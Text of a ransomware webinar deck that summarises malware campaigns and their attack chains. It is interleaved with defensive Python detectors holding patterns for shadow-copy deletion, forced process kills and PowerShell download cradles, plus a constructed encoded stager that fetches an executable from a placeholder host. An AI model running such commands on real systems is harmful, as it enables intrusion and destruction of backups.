
STOPPING RANSOMWARE & ADVANCED MALWARE THREATS:
THE CURRENT SCOPE OF THESE THREATS AND TOOLS TO SHUT THEM DOWN
MICHAEL ZUCKERMAN, PRODUCT MANAGEMENT, INFOBLOX
WEBINAR INFORMATION & QUICK TIPS

• The Presentation Deck can be downloaded from the MATERIALS window.

• Windows can be hidden or expanded to fit your preference.

• Submit questions in the Q&A window.

• Use the HELP icon at the bottom for FAQs and system requirements.

• Please click on the ISACA Customer Experience Center image to be redirected to ISACA’s customer support page.
CPE CERTIFICATE & CREDIT

LIVE EVENT & ON DEMAND RECORDING

• You must view the live or recorded webinar for the required amount of time (50
minutes). We encourage you to stay on and watch the entire webinar.

• Check the CPE Credit and Certificate window to view the timer.

• Your CPE Certificate will automatically appear in the ISACA CPE RECORDS tab
on the MyISACA page in your account after completing the required viewing time.

• Please be patient. This process could take up to 24 hours for your CPE Certificate
to appear in your account and another 24 hours for your CPE Credit to be applied
to your CPE Manager.
TODAY’S SPEAKER

Michael Zuckerman

Product Management

Infoblox
AGENDA

• State of the Ransomware Union 2020
• The Emergence of Targeted Ransomware
• Anatomy of an Attack
  – City of Pensacola, Florida Hit by Maze Ransomware for $1,000,000 Disaster
• The Escalating Cost of an Attack
• Ransomware-as-a-Service
• A Close Look @ Ransomware Variants
  – The Great Coronavirus Deception!
  – Nemty Ransomware Loves You
  – SWIFT-Themed Campaigns
  – Ursnif Banking Trojan
  – Emotet Stole Christmas
  – Dridex Banking Trojan
  – Dreambot Banking Trojan
  – Rig Exploit Kit Drops Predator The Thief & CrySIS
  – Maze Ransomware
  – PsiXBot InfoStealer Uses DNS
• Best Practices - IT & the SOC

KEY TAKEAWAYS:
• The State of Ransomware & Other Malware Variants
• How Ransomware Variants Differ
• Defensive Tactics That Work
STATE OF THE RANSOMWARE UNION

The Good
• The number of ransomware incidents in
2018 decreased substantially

The Bad
• Enterprise-focused ransomware attacks are
up 12% in 2019.
• The pace continues to grow as
ransomware attacks in healthcare grew
350% in Q4 2019.

The Ugly
• These targeted ransomware attacks are the
most dangerous and most sophisticated.
TARGETED RANSOMWARE GOES AFTER THE ENTERPRISE

• SamSam was one of the earliest forms of targeted ransomware
• Ryuk started in 2018
• Many others arriving on the scene continually
TARGETED RANSOMWARE IS POUNDING U.S. ENTERPRISE

• The U.S. has been hardest hit, as the SamSam group has been targeting the U.S. market for some time

• The U.K., Turkey, Australia and Canada follow
ONE VERTICAL EXAMPLE: THE TARGETED RANSOMWARE
ASSAULT ON CITIES

In 2019, targeted ransomware attacks hit multiple cities in the United States and selected international targets

• City of Pensacola, Florida
• Johannesburg, South Africa - Electric Utility
• Lake City, Florida
• Riviera Beach, Florida
• City of Baltimore, Maryland
• Cleveland, Ohio - Hopkins Intl Airport
• Augusta, Maine
• Tallahassee, Tennessee
• Albany, New York
• Jackson County, Georgia
ANATOMY OF AN ATTACK: RANSOMWARE ATTACK HITS CITY OF
PENSACOLA, FLA.
• In December 2019, the City of Pensacola, Florida was infected by Maze ransomware and held hostage for $1,000,000

• Nearly all of the city hall’s computer communication systems were down, as well as online payment systems for Pensacola Energy and the city’s sanitation department.

• The city’s IT department had to take down many of their systems as a precaution.

• BleepingComputer confirmed that they were attacked by the Maze ransomware group, who stated they stole data from the city before encrypting the network and then promptly demanded $1,000,000.

• Pensacola City hired Deloitte for $140,000 to evaluate the extent of the cyberattack.
THE HIGH COST OF EXTORTION

Riviera Beach City, Florida
• The City of Riviera Beach City, Florida paid $600,000 to regain access to files encrypted during a ransomware attack

Lake City, Florida
• The City of Lake City, Florida paid $500,000 to regain access to encrypted files

City of Pensacola, Florida
• $1,000,000 ransom demanded – now what???

EXTORTION
A person obtains property from another using coercion (e.g., threats of future physical injury, property damage, or exposure to criminal charges or public humiliation) or an implicit or explicit threat to give the payer worse than fair treatment.

There is a clear offender (the person using coercion) and the victim (the threatened person) who is intimidated into turning over property to the offender.
THE HIGH COSTS OF RECOVERY

Atlanta, Georgia - City Government
• Atlanta, Georgia was hit with SamSam and it appears now that it might cost the city $17 million to recover - this figure is unverified by the City

Colorado Department of Transportation
• A ransomware attack against Colorado’s Department of Transportation might end up costing about $2 million to remediate.

Baltimore, Maryland - City Government
• Baltimore, Maryland was hit with ransomware and Baltimore’s budget office estimated that the ransomware attack may cost over $18 million
RANSOMWARE AS A SERVICE (RAAS) A BIG BUSINESS FOR
ORGANIZED CRIME
Ransomware as a Service (RaaS)
• Just like any SaaS business, you want to reduce investment, run the latest software, and get good support

• Outsource R&D to software developers for 15% of the ransom you gather

• Your (criminal) partner builds the ransomware, hosts it in the cloud, and gives you a configurable and easily deployable toolset
A CLOSE LOOK AT RANSOMWARE VARIANTS

• The Great Coronavirus Deception

• Nemty Ransomware Loves You

• SWIFT-Themed Campaigns

• Ursnif Banking Trojan

• Emotet Stole Christmas

• Dridex Banking Trojan

• Dreambot Banking Trojan

• Rig Exploit Kit Drops Predator The Thief & CrySIS

• Maze Ransomware

• PsiXBot InfoStealer Uses DNS


FORMBOOK CORONAVIRUS CAMPAIGNS

Overview
• From 24 March through 2 April, Infoblox
observed several malicious spam (malspam)
campaigns delivering Formbook malware.
• The campaigns are connected by a
Coronavirus or COVID-19-related theme in their
subject lines or file attachment names.

Customer Impact
• Formbook is an information stealer (infostealer) that is sold as a service to threat actors. Its capabilities include process hollowing, clipboard monitoring, keylogging, webform hijacking, screenshotting, downloading additional payloads, and communicating with a C&C server.

Campaign Analysis
• All of the campaigns we observed used a Coronavirus theme or were related to a campaign that did.
FORMBOOK CORONAVIRUS CAMPAIGNS

Attack Chain

• Once the recipient opens (and if necessary, decompresses) the attached file, the malware performs process hollowing and injects itself into the Microsoft File Explorer process.

• Next, a portable executable (either doc.exe or RFQ-QUOTAION-31-03-2020.exe) launches the Formbook payload (nbtstat.exe or mstsc.exe). The malware then proceeds to steal victim credentials and information and uses firefox.exe to create new files with the stolen information.
TRICKBOT WHO? CORONAVIRUS RIDES AGAIN

Overview
• From 21 to 24 March, Infoblox observed
another malicious spam (malspam) email
campaign that used a fraudulent Coronavirus
alert from the World Health Organization
(WHO) to deliver Trickbot banking malware.

Customer Impact
• Trickbot is a modular banking trojan that targets customers of major banks. Once Trickbot infects a victim, it will attempt to steal sensitive financial information and exfiltrate that data to a command and control (C2) server. Trickbot also attempts to move laterally across vulnerable networks.

Campaign Analysis
• The Trickbot campaign that Infoblox observed used a Coronavirus theme to lure recipients into opening a malicious Microsoft Word document.
TRICKBOT WHO? CORONAVIRUS RIDES AGAIN

Attack Chain
• When the recipient opens the malicious Word document and enables macros, the macros within the document create a new directory, C:\netstats, and generate two files within it.

• The first, PressTableList.jse, is a Microsoft JScript file containing the malicious payload.

• The second is a basic Windows command (CMD) file, PressTableList.cmd, that is used to execute the malicious JScript. Once these files are created, the macro executes the CMD file, which executes the JScript file.
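The two-file drop described above (a .jse payload plus a .cmd launcher written by WINWORD.EXE into a freshly created directory) is exactly what endpoint file-creation telemetry can catch. The Python below is an added example, not Infoblox's or the presenter's code: it runs a simple detection over constructed Sysmon-style FileCreate records (the field names time, image and target are assumptions, as is the event list itself) and then groups script drops by directory so that a payload and its launcher surface in one alert.

```python
from collections import defaultdict
from datetime import datetime

# Constructed Sysmon Event ID 11 (FileCreate) style records; not real telemetry.
SAMPLE_EVENTS = [
    {"time": "2020-03-23T09:14:02",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "target": r"C:\netstats\PressTableList.jse"},
    {"time": "2020-03-23T09:14:03",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "target": r"C:\netstats\PressTableList.cmd"},
    {"time": "2020-03-23T09:20:11",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "target": r"C:\Users\alice\Documents\report.docx"},   # benign document save
    {"time": "2020-03-23T09:31:40",
     "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\Users\alice\scripts\build.cmd"},       # script, but not from Office
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_EXTENSIONS = {".jse", ".js", ".vbs", ".vbe", ".cmd", ".bat", ".ps1", ".hta"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def dirname(path):
    return path.rsplit("\\", 1)[0]


def extension(name):
    i = name.rfind(".")
    return name[i:].lower() if i >= 0 else ""


def office_script_drops(events):
    """Return FileCreate events where an Office process wrote an executable script file."""
    hits = []
    for ev in events:
        if (basename(ev["image"]).lower() in OFFICE_IMAGES
                and extension(ev["target"]) in SCRIPT_EXTENSIONS):
            hits.append(ev)
    return hits


def group_drops_by_directory(hits, window_seconds=60):
    """Group script drops that land in the same directory within the window.

    The Trickbot macro writes the .jse payload and its .cmd launcher together,
    so one alert per directory (with both file names) is more useful than two.
    """
    by_dir = defaultdict(list)
    for ev in hits:
        by_dir[dirname(ev["target"]).lower()].append(ev)
    clusters = {}
    for directory, evs in by_dir.items():
        evs.sort(key=lambda e: e["time"])
        first = datetime.fromisoformat(evs[0]["time"])
        last = datetime.fromisoformat(evs[-1]["time"])
        if (last - first).total_seconds() <= window_seconds:
            clusters[directory] = [basename(e["target"]) for e in evs]
    return clusters


if __name__ == "__main__":
    for directory, names in group_drops_by_directory(office_script_drops(SAMPLE_EVENTS)).items():
        print(f"ALERT: Office process dropped scripts in {directory}: {', '.join(names)}")
```

The script extension list is deliberately broader than the two types in this campaign; tune OFFICE_IMAGES and SCRIPT_EXTENSIONS to the applications actually deployed, and expect a small number of legitimate hits from users who genuinely save macros-as-scripts from Office.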
NEW AGENT TESLA INFOSTEALER CAMPAIGNS USE
CORONAVIRUS
Overview
• Since 16 March, we observed a series of
campaigns using COVID-19 or Coronavirus-
themed spam emails to distribute the Agent
Tesla information stealer (infostealer).
• But wait! There’s more!

Customer Impact
• Agent Tesla is an easy-to-use, readily available keylogger that can capture and store keystrokes, steal credentials and information from forms, and exfiltrate data to a command and control (C2) server.
• So many email variants … so little time!

Campaign Analysis
• While all of the campaigns we initially observed used a Coronavirus theme in the email subjects, pivoting on one of the sender hostnames allowed us to find several additional campaigns.
NEW AGENT TESLA INFOSTEALER CAMPAIGNS USE
CORONAVIRUS
Attack Chain

• As with previous Agent Tesla campaigns, once the recipient opened the attachment and decompressed the archive file, the executable inside launched the malware, gathered victim information, and then reached out to send the data to an FTP or SMTP server.

• Some of the recent samples also reached out to Google Drive before attempting to exfiltrate the victim’s data to an FTP or SMTP server.
SPOOFED CORONAVIRUS MAP DELIVERS AZORULT
INFOSTEALER
Overview
• On 9 March, Reason Security reported on a
malicious campaign that used a weaponized
Coronavirus map to deliver the AZORult
information stealer (infostealer).

Customer Impact
• AZORult is an infostealer that can steal a victim’s credentials, Bitcoin wallets, chat logs, and files.
• It can also take screenshots of the infected system and transmit them to the attacker.

Campaign Analysis
• The primary lure in this campaign was a Coronavirus map that was a repurposed version of the legitimate Coronavirus dashboard produced by Johns Hopkins University. How low can you go?!
SPOOFED CORONAVIRUS MAP DELIVERS AZORULT
INFOSTEALER
Attack Chain
• When the victim downloads and runs the malicious executable, it creates and runs two additional executables.

• The first, Corona-virus-Map.com.exe, is a benign Coronavirus dashboard that the threat actors plagiarized from Johns Hopkins University. This file is essentially a decoy to convince the victim that the application is legitimate.

• The second executable, Corona.exe, is an AZORult unpacker that contains an embedded Windows batch file and a password-protected archive.
LOKIBOT RIDES CORONAVIRUS

Overview
• During the first week of March, LokiBot
infostealer joined the list of malware being
distributed by threat actor(s) taking advantage
of the fear and interest in the spread of
Coronavirus (COVID-19).

Customer Impact
• LokiBot has become a popular information stealer that collects credentials and security tokens from infected machines.
• LokiBot targets multiple applications, including but not limited to Mozilla Firefox, Google Chrome, Thunderbird, as well as FTP.

Campaign Analysis
• Threat actors behind LokiBot regularly use attachments that are archived files, notably RAR, TAR, and GZ file types.
• In previous LokiBot campaigns, we have seen threat actors use LZH and ISO files as well for their attachments.
LOKIBOT RIDES CORONAVIRUS

Attack Chain

• Once the recipient opens the attached archive file and clicks on the executable, it reaches out to Google Drive and downloads a file matching the naming pattern from February’s campaign.

• The malware then steals the victim’s information and sends it to a command and control (C2) server.
NEMTY RANSOMWARE LOVES YOU

Overview
• Nemty ransomware made its first attempt to target English-speaking victims with a malspam campaign
• Nemty only recently started using malspam as a distribution method.
• Nemty malspam campaigns have been restricted to targets in the Asia-Pacific region (APAC).

Customer Impact
• Nemty is a ransomware that finds & deletes shadow copies of files before it encrypts them, making it difficult for users to restore files without payment.
• The threat actors behind Nemty announced their intention to begin leaking the confidential data of victims who refuse to pay their ransom.

Campaign Analysis
• The campaign in this report used a classic “secret admirer” lure reminiscent of the ILOVEYOU worm of 2000.
NEMTY RANSOMWARE LOVES YOU

Attack Chain
• When the victim extracts and executes the malicious JavaScript file contained within the ZIP file attachment, it launches a PowerShell command that retrieves and executes the Nemty ransomware payload from a remote server.
• Nemty uses the Windows vssadmin command to delete any existing shadow copies of files to prevent the victim from easily restoring them.
• Nemty uses the taskkill command to stop processes and services that may prevent it from successfully encrypting files.
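The shadow-copy deletion and the burst of taskkill commands above are the two most detectable moments before encryption starts, and they are far more meaningful together than apart. The following Python is an added example, not Infoblox's or the presenter's code: it classifies constructed process-creation records (Sysmon Event ID 1 style; the field names time, host and cmdline and the sample list are assumptions) and, for every shadow-copy deletion, counts forced kills on the same host in the preceding window so the alert carries that context.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records; not real telemetry.
SAMPLE_EVENTS = [
    {"time": "2020-02-10T13:02:10", "host": "ws-17", "cmdline": "taskkill /f /im sqlservr.exe"},
    {"time": "2020-02-10T13:02:10", "host": "ws-17", "cmdline": "taskkill /f /im outlook.exe"},
    {"time": "2020-02-10T13:02:11", "host": "ws-17", "cmdline": "taskkill /f /im excel.exe"},
    {"time": "2020-02-10T13:02:12", "host": "ws-17", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"time": "2020-02-10T13:05:00", "host": "ws-17", "cmdline": "taskkill /f /im winword.exe"},  # after the deletion, not counted
    {"time": "2020-02-10T08:00:00", "host": "srv-bk", "cmdline": "vssadmin list shadows"},          # admin listing, benign
    {"time": "2020-02-10T08:30:00", "host": "ws-03", "cmdline": "taskkill /im notepad.exe"},        # no /f, benign
]

# vssadmin ... delete ... shadows (any argument order/spacing, case-insensitive)
SHADOW_DELETE = re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.IGNORECASE)
# taskkill with the force flag, which ransomware uses to unlock files held by running apps
FORCED_KILL = re.compile(r"\btaskkill(?:\.exe)?\b.*\s/f\b", re.IGNORECASE)


def classify(cmdline):
    """Tag a command line as 'shadow_delete', 'forced_kill', or None."""
    if SHADOW_DELETE.search(cmdline):
        return "shadow_delete"
    if FORCED_KILL.search(cmdline):
        return "forced_kill"
    return None


def find_ransomware_precursors(events, window_seconds=120, min_kills=3):
    """For each shadow-copy deletion, count forced taskkills on the same host in the
    preceding window. Deletion alone is 'medium' (admins do it too); deletion after a
    burst of forced kills is 'high'."""
    tagged = []
    for e in events:
        kind = classify(e["cmdline"])
        if kind:
            tagged.append((datetime.fromisoformat(e["time"]), e["host"], kind))
    tagged.sort()
    alerts = []
    for t, host, kind in tagged:
        if kind != "shadow_delete":
            continue
        start = t - timedelta(seconds=window_seconds)
        kills = sum(1 for t2, h2, k2 in tagged
                    if h2 == host and k2 == "forced_kill" and start <= t2 <= t)
        alerts.append({"host": host, "time": t.isoformat(), "forced_kills": kills,
                       "severity": "high" if kills >= min_kills else "medium"})
    return alerts


if __name__ == "__main__":
    for a in find_ransomware_precursors(SAMPLE_EVENTS):
        print(f"{a['severity'].upper()}: {a['host']} deleted shadow copies at {a['time']} "
              f"after {a['forced_kills']} forced kills")
```

Backup agents and storage administrators legitimately run vssadmin, so the medium-severity path is where allow-listing by host or account belongs; the high-severity path (kills followed by deletion within two minutes) is rarely benign and is a reasonable trigger for automated host isolation.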
SWIFT-THEMED CAMPAIGNS

Overview
• Malspam leverages themes referencing the SWIFT payments network.
• The malspam campaigns were delivering several malware families, including Agent Tesla keylogger, Lokibot infostealer, and more.
• The TTPs appear similar to activity conducted by the threat actor SWEED as reported by Talos in 2019.

Customer Impact
• Agent Tesla can capture and store keystrokes, steal credentials, and exfiltrate data to a command and control (C2) server, potentially via email messages to a remote mail server.

Campaign Analysis
• All the emails we discovered used the acronym “SWIFT” either in the subject line or the attachment’s file name.
SWIFT-THEMED CAMPAIGNS

Attack Chain

• The attack chains varied somewhat across the campaigns, but all required the recipient to open an attached file that was often compressed.

• Many of the samples reached out to Google Drive and downloaded files that matched the following pattern: [a-zA-Z]{3,}_encrypted_[0-9A-Z]{7}\[1\].bin
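Google Drive as a staging host recurs in the Agent Tesla, LokiBot and SWIFT campaigns above, and the SWIFT report gives a concrete file-name pattern to hunt for. The Python below is an added example, not Infoblox's or the presenter's code: it compiles the report's pattern (anchored, and with the dot before "bin" escaped so it matches only a literal ".bin"; the report's unescaped form would also match "xbin") and applies it to constructed download records from a proxy that logs the served file name. The record fields client, url and filename, and the records themselves, are assumptions.

```python
import re
from urllib.parse import urlsplit

# Pattern from the SWIFT report, anchored and with the dot escaped.
ENCRYPTED_BLOB_NAME = re.compile(r"^[a-zA-Z]{3,}_encrypted_[0-9A-Z]{7}\[1\]\.bin$")

GOOGLE_DRIVE_HOSTS = ("drive.google.com", "docs.google.com")


def is_google_drive(url):
    """True when the URL's host is a Google Drive/Docs download endpoint."""
    host = (urlsplit(url).hostname or "").lower()
    return host in GOOGLE_DRIVE_HOSTS or host.endswith(".googleusercontent.com")


def matches_blob_name(filename):
    return bool(ENCRYPTED_BLOB_NAME.match(filename))


# Constructed download records; not real traffic. Drive IDs are placeholders.
SAMPLE_DOWNLOADS = [
    {"client": "10.0.0.21", "url": "https://drive.google.com/uc?export=download&id=EXAMPLE1",
     "filename": "Abc_encrypted_A1B2C3D[1].bin"},                       # pattern + Drive
    {"client": "10.0.0.22", "url": "https://drive.google.com/uc?export=download&id=EXAMPLE2",
     "filename": "Quarterly_report.pdf"},                               # ordinary Drive use
    {"client": "10.0.0.23", "url": "https://files.example.invalid/x",
     "filename": "Xyz_encrypted_ZZZZZZZ[1].bin"},                       # pattern, other host
    {"client": "10.0.0.24", "url": "https://drive.google.com/uc?export=download&id=EXAMPLE3",
     "filename": "ab_encrypted_ABCDEFG[1].bin"},                        # only two letters: no match
    {"client": "10.0.0.25", "url": "https://drive.google.com/uc?export=download&id=EXAMPLE4",
     "filename": "Abc_encrypted_A1B2C3D[1]xbin"},                       # unescaped dot would match this
]


def flag_downloads(records):
    """Return (client, filename, reason) tuples. Drive + pattern is the strongest
    signal; the pattern from any other host still gets a lower-priority flag."""
    flagged = []
    for r in records:
        name_hit = matches_blob_name(r["filename"])
        if name_hit and is_google_drive(r["url"]):
            flagged.append((r["client"], r["filename"], "drive+pattern"))
        elif name_hit:
            flagged.append((r["client"], r["filename"], "pattern-only"))
    return flagged


if __name__ == "__main__":
    for client, name, reason in flag_downloads(SAMPLE_DOWNLOADS):
        print(f"{reason}: {client} fetched {name}")
```

Because Drive is also heavily used for legitimate work, the host alone is not a signal; the value is in pairing it with the file-name pattern, and the same approach extends to any naming convention extracted from future campaign reports.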
URSNIF BANKING TROJAN

Overview
• Between 23 and 24 January, security researcher
Brad Duncan reported two separate malicious
spam campaigns that used compressed
Microsoft Word documents with malicious macros
to deliver Ursnif malware.

Customer Impact
• Ursnif is a variant of the Gozi banking trojan that can steal credentials, cryptocurrency wallets, and email information. Upon infection, Ursnif injects its code into the Internet Explorer (IE) browser, then uses IE to manage communications with its command and control (C2), including follow-on downloads.

Campaign Analysis
• The Ursnif campaign sent messages that appeared to be replies to existing email chains and asked the recipient(s) to open an attached ZIP file with a specific password.
URSNIF BANKING TROJAN

Attack Chain
HOW EMOTET STOLE CHRISTMAS

Overview
• Leading up to 25 December, Infoblox observed
an email campaign themed around both
Christmas and Swedish environmental activist
Greta Thunberg to lure recipients into opening
Microsoft Word documents with malicious macros
that infected victims with the Emotet information
stealer.

Customer Impact
• Emotet is an information stealer and trojan downloader that targets businesses through email.
• Once Emotet infects a victim’s device, it steals various sensitive credentials and communicates with its command and control (C2) server to receive further instructions.

Campaign Analysis
• The campaign that Infoblox observed used emails whose subject lines often varied but always included Greta Thunberg’s name. Most of these subject lines also included the phrase “Time Person of the Year 2019.”
HOW EMOTET STOLE CHRISTMAS

Attack Chain
When the recipient opens the malicious Word document and enables macros, the macros decode and execute a PowerShell command that downloads the Emotet payload from a compromised website, and then executes it:
• Upon execution, Emotet attempts to spread laterally across the victim’s network to infect additional devices while stealing sensitive information from all infected devices.
• Throughout the infection process Emotet contacts its C2 servers to transmit stolen credentials, receive new instructions, and retrieve additional malware payloads.
DRIDEX BANKING TROJAN

Overview
• In December we observed a malicious email
campaign distributing Dridex banking trojan. Like
our first Dridex report in June, the emails had
password-protected Microsoft Office document
attachments that used macros with hardcoded
URLs to download and execute Dridex payloads.

Customer Impact
• Dridex is a banking trojan that was first discovered in 2011 and became one of the most distributed of its kind by 2015.
• Dridex operators have historically targeted the financial services sector, including both financial institutions and their customers.

Campaign Analysis
• In the campaign we observed, the malicious emails mimicked an automated payroll notification from Automatic Data Processing, Inc. (ADP), an American provider of human resource management software.
DRIDEX BANKING TROJAN

Attack Chain

• Victims who opened the attached OpenXML files in this campaign were prompted to enter a 3 to 4-digit password found in the body of the email.

• When victims entered the password and enabled document macros, the file executed a PowerShell command to download the Dridex payload from an external website.

• The command used a VBScript named visitcard.vbs to write the Dridex payload to c:\Colorfonts32\secpi15.exe.
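The Emotet and Dridex chains above share one step: a Word macro launching PowerShell to fetch the payload, and in Emotet's case the command is first decoded by the macro. An Office parent spawning PowerShell is one of the highest-value process-creation detections there is, and the encoded form is easy to unwrap. The Python below is an added example, not Infoblox's or the presenter's code: it scores constructed process-creation records (field names image, parent_image and cmdline are assumptions) and decodes a -EncodedCommand argument, which PowerShell defines as base64 over UTF-16LE. The sample stager is built in the block itself with a placeholder host; it is constructed, not a real command from the campaigns.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Substrings that characterise download cradles; matched against the decoded, lower-cased script.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "net.webclient", "invoke-expression",
                  "iex ", "invoke-webrequest", "start-bitstransfer")


def encode_powershell(command):
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64).
    Used here only to construct the sample record."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """If the command line carries -EncodedCommand/-enc/-ec/-e <base64>, return the
    decoded script; otherwise return the command line unchanged."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze_process_event(event):
    """Return the reasons a PowerShell launch looks like a macro stager (empty list if none)."""
    reasons = []
    if basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return reasons
    if basename(event["parent_image"]) in OFFICE_PARENTS:
        reasons.append("office-parent")
    script = decode_encoded_command(event["cmdline"]).lower()
    if script != event["cmdline"].lower():
        reasons.append("encoded-command")
    hits = [m for m in CRADLE_MARKERS if m in script]
    if hits:
        reasons.append("download-cradle:" + ",".join(hits))
    if re.search(r"-w(?:indowstyle)?\s+hidden", event["cmdline"], re.IGNORECASE):
        reasons.append("hidden-window")
    return reasons


# Constructed sample: a macro-launched, encoded stager pointing at a placeholder host.
_SAMPLE_SCRIPT = ("(New-Object Net.WebClient).DownloadFile("
                  "'http://placeholder.invalid/f','C:\\Users\\Public\\f.exe')")
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -w hidden -enc " + encode_powershell(_SAMPLE_SCRIPT)},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},   # admin script, benign
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["parent_image"]), "->", basename(ev["image"]), analyze_process_event(ev))
```

"office-parent" on its own is worth an alert in most environments; the decoded script is what lets an analyst confirm the download target and block it at the DNS or proxy layer, which is where the DNS-centred defenses later in this deck apply.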
DREAMBOT BANKING TROJAN

Overview
• On 7 November, we observed two email campaigns distributing the banking trojan Dreambot, which is a variant of Ursnif.
• Threat actors have distributed Dreambot since 2016, targeting financial customers in Australia, Italy, Switzerland, the U.K., the U.S., Poland, and Canada.

Customer Impact
• Dreambot extends Ursnif’s functionality with the ability to communicate over Tor.
• Dreambot targets financial institutions’ customers to steal authentication information.
• Dreambot can log keystrokes, inject into web pages, steal web form and email data, and take screenshots.

Campaign Analysis
• In the campaigns we observed, the emails are written in Czech or Slovenian and reference the user’s financial information.
• Threat actors distribute Dreambot through email attachments or emails containing a link to a file.
DREAMBOT BANKING TROJAN

Attack Chain
• When the email recipient opens the DOCX attachment, Microsoft Office downloads the externally linked template.
• Office then applies the template and opens the DOCX file.
• This triggers the VBA code in the template.
• The VBA code runs PowerShell commands to download and execute Dreambot using Regsvr32.exe.
• The malware injects itself into Explorer.exe and runs CMD.exe commands to profile the user’s computer.
• Dreambot then sends this information to its command and control (C2) server.
RIG EXPLOIT KIT DROPS INFOSTEALER & CRYSIS RANSOMWARE

Overview
• On 17 November, Broad Analysis
reported a campaign that used Rig
exploit kit to distribute an infostealer
known as Predator The Thief, followed
by a variant of CrySIS ransomware.

Customer Impact
• Rig is an exploit kit (EK)
• Predator The Thief is an infostealer used to harvest login credentials, cryptocurrency wallets, and more.
• CrySIS is a ransomware that extorts victims by encrypting files on their system and demanding a fee to decrypt them.

Campaign Analysis
• The campaign reported by Broad Analysis used malvertisements placed on legitimate websites to redirect vulnerable users to malicious websites containing the Rig exploit kit.
• This in turn was used to deliver Predator The Thief and CrySIS.
RIG EXPLOIT KIT DROPS INFOSTEALER AND RANSOMWARE

Attack Chain
MAZE RANSOMWARE

Overview
• On 29 October, we detected a campaign distributing
Maze ransomware (a variant of ChaCha ransomware)
to Italian-speaking users.
• The emails appeared to be from the Italian Revenue
Agency and instructed users to open an attached
Microsoft Word document with “financial guidelines.”

Customer Impact
• Maze ransomware uses 2048-bit RSA and the ChaCha20 stream cipher to encrypt individual files and seems to append different extensions.
• It then changes the user's desktop wallpaper to display a message about the encrypted files and the file name of the dropped ransom note.

Campaign Analysis
• The emails we saw were sent by one of two email accounts designed to appear to be from an official Italian govt. agency.
• Both email domains were actor controlled and registered with PublicDomainRegistry on 25 October.
MAZE RANSOMWARE

Attack Chain
Each Word document was embedded with a macro that downloaded Maze ransomware from the actor-controlled server.
• The macro then wrote the ransomware payload to C:\Windows\Temp\wordupd.tmp and executed it.
• After Maze encrypted the victim’s files, it made HTTP POST requests to several IP-based URLs that began with the first octet 91. Only a few of these requests returned a 200 response code, indicating a successful connection.
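The post-encryption traffic above has a shape that stands out in proxy logs: a single workstation issuing POSTs to several bare public IP addresses in quick succession, most of them failing. The Python below is an added example, not Infoblox's or the presenter's code: it parses constructed proxy log lines (the five-field format and the addresses are assumptions; the 91.x addresses are made up to echo the report and are not indicators) and summarises, per client, POSTs whose host is an IP literal rather than a name, ignoring private ranges where internal services legitimately live.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log lines, "<timestamp> <client> <method> <url> <status>"; not real traffic.
# A status of 0 stands for a connection that never got an HTTP response.
SAMPLE_LOG = """\
2019-10-29T10:01:02 10.1.5.40 POST http://91.0.0.10/ 0
2019-10-29T10:01:03 10.1.5.40 POST http://91.0.0.11/ 0
2019-10-29T10:01:05 10.1.5.40 POST http://91.0.0.12/ 200
2019-10-29T10:01:06 10.1.5.40 POST http://91.0.0.13/ 0
2019-10-29T10:02:00 10.1.5.41 GET https://www.example.invalid/index.html 200
2019-10-29T10:02:30 10.1.5.41 POST https://api.example.invalid/login 200
2019-10-29T10:03:00 10.1.5.42 POST http://10.1.0.5:8080/metrics 200
"""


def host_is_ip_literal(url):
    """Return the ip_address object when the URL's host is a bare IP, else None."""
    host = urlsplit(url).hostname
    if host is None:
        return None
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def parse_log(text):
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status = line.split()
        rows.append({"ts": ts, "client": client, "method": method, "url": url, "status": int(status)})
    return rows


def ip_literal_posts(rows, ignore_private=True):
    """Per client: POST requests to IP-literal hosts (public only by default), with
    how many succeeded and the distinct hosts contacted."""
    summary = defaultdict(lambda: {"posts": 0, "ok": 0, "hosts": set()})
    for r in rows:
        if r["method"] != "POST":
            continue
        ip = host_is_ip_literal(r["url"])
        if ip is None or (ignore_private and ip.is_private):
            continue
        s = summary[r["client"]]
        s["posts"] += 1
        if r["status"] == 200:
            s["ok"] += 1
        s["hosts"].add(str(ip))
    return {c: {"posts": v["posts"], "ok": v["ok"], "hosts": sorted(v["hosts"])}
            for c, v in summary.items()}


if __name__ == "__main__":
    for client, s in ip_literal_posts(parse_log(SAMPLE_LOG)).items():
        print(f"{client}: {s['posts']} POSTs to {len(s['hosts'])} bare IPs, {s['ok']} succeeded")
```

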